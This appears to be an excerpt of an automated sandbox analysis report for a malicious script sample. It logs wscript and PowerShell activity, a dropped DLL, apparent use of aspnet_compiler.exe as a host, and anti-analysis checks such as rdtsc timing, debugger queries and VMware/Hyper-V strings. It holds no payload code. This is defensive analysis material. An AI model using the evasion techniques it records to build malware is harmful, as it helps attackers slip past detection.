Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_00F8D1C0 rdtsc

11_2_00F8D1C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6680	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2997	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3615	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6130	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

API coverage: 0.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2300	Thread sleep count: 6680 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 984	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116	Thread sleep count: 2997 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3504	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 2284	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000007.00000002.2634617778.000000000B831000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 4']qemU
Source: powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: wscript.exe, 00000006.00000002.2222547119.0000000004F49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2237972542.0000000007E1D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2236243649.0000000006F45000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2237972542.0000000007DF9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000006.00000002.2222547119.0000000004F49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000003.00000002.2228926984.0000000004898000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000007.00000002.2538077937.0000000006DA5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_00F8D1C0 rdtsc

11_2_00F8D1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_00417063 LdrLoadDll,

11_2_00417063

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0C0F0 mov eax, dword ptr fs:[00000030h]	11_2_00F0C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F520F0 mov ecx, dword ptr fs:[00000030h]	11_2_00F520F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0A0E3 mov ecx, dword ptr fs:[00000030h]	11_2_00F0A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F350E4 mov eax, dword ptr fs:[00000030h]	11_2_00F350E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F350E4 mov ecx, dword ptr fs:[00000030h]	11_2_00F350E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F180E9 mov eax, dword ptr fs:[00000030h]	11_2_00F180E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F920DE mov eax, dword ptr fs:[00000030h]	11_2_00F920DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE50D9 mov eax, dword ptr fs:[00000030h]	11_2_00FE50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F390DB mov eax, dword ptr fs:[00000030h]	11_2_00F390DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov ecx, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov ecx, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov ecx, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov ecx, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F270C0 mov eax, dword ptr fs:[00000030h]	11_2_00F270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F8D0C0 mov eax, dword ptr fs:[00000030h]	11_2_00F8D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F8D0C0 mov eax, dword ptr fs:[00000030h]	11_2_00F8D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD60B8 mov eax, dword ptr fs:[00000030h]	11_2_00FD60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD60B8 mov ecx, dword ptr fs:[00000030h]	11_2_00FD60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3D090 mov eax, dword ptr fs:[00000030h]	11_2_00F3D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3D090 mov eax, dword ptr fs:[00000030h]	11_2_00F3D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F15096 mov eax, dword ptr fs:[00000030h]	11_2_00F15096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F4909C mov eax, dword ptr fs:[00000030h]	11_2_00F4909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F1208A mov eax, dword ptr fs:[00000030h]	11_2_00F1208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0D08D mov eax, dword ptr fs:[00000030h]	11_2_00F0D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3C073 mov eax, dword ptr fs:[00000030h]	11_2_00F3C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov ecx, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F21070 mov eax, dword ptr fs:[00000030h]	11_2_00F21070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F8D070 mov ecx, dword ptr fs:[00000030h]	11_2_00F8D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE5060 mov eax, dword ptr fs:[00000030h]	11_2_00FE5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F12050 mov eax, dword ptr fs:[00000030h]	11_2_00F12050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F3B052 mov eax, dword ptr fs:[00000030h]	11_2_00F3B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FB705E mov ebx, dword ptr fs:[00000030h]	11_2_00FB705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FB705E mov eax, dword ptr fs:[00000030h]	11_2_00FB705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD903E mov eax, dword ptr fs:[00000030h]	11_2_00FD903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD903E mov eax, dword ptr fs:[00000030h]	11_2_00FD903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD903E mov eax, dword ptr fs:[00000030h]	11_2_00FD903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FD903E mov eax, dword ptr fs:[00000030h]	11_2_00FD903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0A020 mov eax, dword ptr fs:[00000030h]	11_2_00F0A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F0C020 mov eax, dword ptr fs:[00000030h]	11_2_00F0C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2E016 mov eax, dword ptr fs:[00000030h]	11_2_00F2E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2E016 mov eax, dword ptr fs:[00000030h]	11_2_00F2E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2E016 mov eax, dword ptr fs:[00000030h]	11_2_00F2E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F2E016 mov eax, dword ptr fs:[00000030h]	11_2_00F2E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F401F8 mov eax, dword ptr fs:[00000030h]	11_2_00F401F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00FE61E5 mov eax, dword ptr fs:[00000030h]	11_2_00FE61E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F351EF mov eax, dword ptr fs:[00000030h]	11_2_00F351EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F351EF mov eax, dword ptr fs:[00000030h]	11_2_00F351EF
